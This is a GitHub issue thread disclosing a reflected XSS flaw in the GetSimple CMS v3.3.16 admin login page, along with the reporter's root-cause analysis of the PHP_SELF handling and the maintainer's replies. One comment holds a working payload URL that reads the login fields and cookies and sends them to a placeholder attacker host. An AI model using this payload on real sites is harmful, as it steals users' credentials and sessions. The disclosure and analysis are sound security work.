### ISSUE TITLE
Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in 'admin/index.php' 

### ISSUE THREAD

**Issue by boku7** [GetSimpleCMS/GetSimpleCMS#1330]
Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in 'admin/index.php' login portal webpage allows remote attackers to execute JavaScript code in the clients browser & harvest login credentials via client clicking a link, entering credentials, and submitting login form.

**Comment by tablatronix** [comment]
Not sure I ever got the email, let me check

**Comment by tablatronix** [comment]
Got it, overlooked

**Comment by tablatronix** [comment]
Stupid question, mostly a curiosity do you know WHY it breaks the css? I see no reason it should

**Comment by tablatronix** [comment]
d1e7eb522c57df9961662cf87a1c954b498efab4

**Comment by boku7** [comment]
Its your myself(false) function (defined in basic.php) that is echo'd into the form action.

![image](https://user-images.githubusercontent.com/19784872/105215171-2c8c6400-5b0e-11eb-8ea5-9ded941688e1.png)

- This easily shows the issue when you assign the result to a variable.

# Analysis
- Add a variable to see the results of your echo myself(false) function that is injected into the form action.
- Set a breakpoint on line 32 & 33 of the /admin/index.php page.

![image](https://user-images.githubusercontent.com/19784872/105214730-9d7f4c00-5b0d-11eb-9619-554e48848374.png)

- Step into the myself function. If false, the result is:

```php
return htmlentities(basename($_SERVER['PHP_SELF']), ENT_QUOTES);
```

![image](https://user-images.githubusercontent.com/19784872/105215011-f9e26b80-5b0d-11eb-98c9-849a51e9ac37.png)

- See here that:
```php
 $_SERVER[PHP_SELF'] = "/admin/index.php/breakout"
```
![image](https://user-images.githubusercontent.com/19784872/105215537-9f95da80-5b0e-11eb-9a4a-060ff4d2edff.png)

- The PHP function basename() "Returns trailing name component of path"

![image](https://user-images.githubusercontent.com/19784872/105215698-d4099680-5b0e-11eb-911e-b41f1464de98.png)

https://www.php.net/manual/en/function.basename.php

- Since there is no GET arguments sent in the request:
```php
$_SERVER['QUERY_STRING'] = ""
```

As a final result, we end up with:
![image](https://user-images.githubusercontent.com/19784872/105216024-424e5900-5b0f-11eb-8e33-8e4625086055.png)

The above "breakout?" is HTML Encoded, but since it's already the action of a form, it will execute javascript put there when the form is posted.

The '?' at the end presents some initial complications, but it can be discarded out as a comment by adding '//' at the end (URL Encoded).

The HTML Encoding can also be bypassed, as since its JavaScript, you can just use decodeURIComponent() to get any character back you want to use.

Example Payload to steal username and password:
```javascript
http://<TARGET>/admin/index.php/index/javascript:var dFslash = "%2f%2f";var username = document.forms[0].elements[0].value;var password = document.forms[0].elements[1].value;var uri = "http:"+decodeURIComponent(dFslash)+"<ATTACKER>?|USER="+username+"|PASS="+password+"|"+document.cookie;xhr = new XMLHttpRequest();xhr.open("GET", uri, true);xhr.send();alert("Welcome "+username+"! Sending your credentails and session to a remote attacker!");window.location.replace("test");%2f%2f
```

**Comment by tablatronix** [comment]
Yeah its already fixed in 3.4, PHP_SELF is all over the place, 

Thanks for the full disclosure, still wondering about the CSS flow breaking.... lol

**Comment by boku7** [comment]
CSS breaks because the page Style.php (called by the login /admin/index.php page) used to render CSS resolves to /admin/index.php, due to how it is included into the /admin/index.php login page via the include to /admin/template/header.php (line 33).

![image](https://user-images.githubusercontent.com/19784872/105220150-8c860900-5b14-11eb-909f-edd49e0dacef.png)

- See above that path for the href is relative
```html
 href="template/style.php?
```

![image](https://user-images.githubusercontent.com/19784872/105220766-66ad3400-5b15-11eb-8afa-06242edad7a3.png)

- Here you can see in the client browser DOM, the page for CSS resolves to:
```html
http://localhost/admin/index.php/template/style.php?s=&v=3.3.16
```

Due to how the routing works for apache/php, this just returns the index.php page again, not the CSS page.
![image](https://user-images.githubusercontent.com/19784872/105217775-86daf400-5b11-11eb-8f86-34bcc6c38d87.png)
![image](https://user-images.githubusercontent.com/19784872/105217810-935f4c80-5b11-11eb-88a9-b214fa495535.png)

# Call Chain Analysis
- /admin/index.php calls the get_template() function whick exists in /admin/inc/template_functions.php
![image](https://user-images.githubusercontent.com/19784872/105218597-9870cb80-5b12-11eb-8026-a462aee74cd0.png)

- This includes the template/header.php page
![image](https://user-images.githubusercontent.com/19784872/105218710-b9392100-5b12-11eb-9442-9c6168e890fa.png)

**Comment by tablatronix** [comment]
doh, thanks!, I saw it loading and no network error, all assets in 3.4 are absolute now, except for style.php, that might be a bug.

Interesting that apache doesn't discard pathing after .php, I never noticed this before.
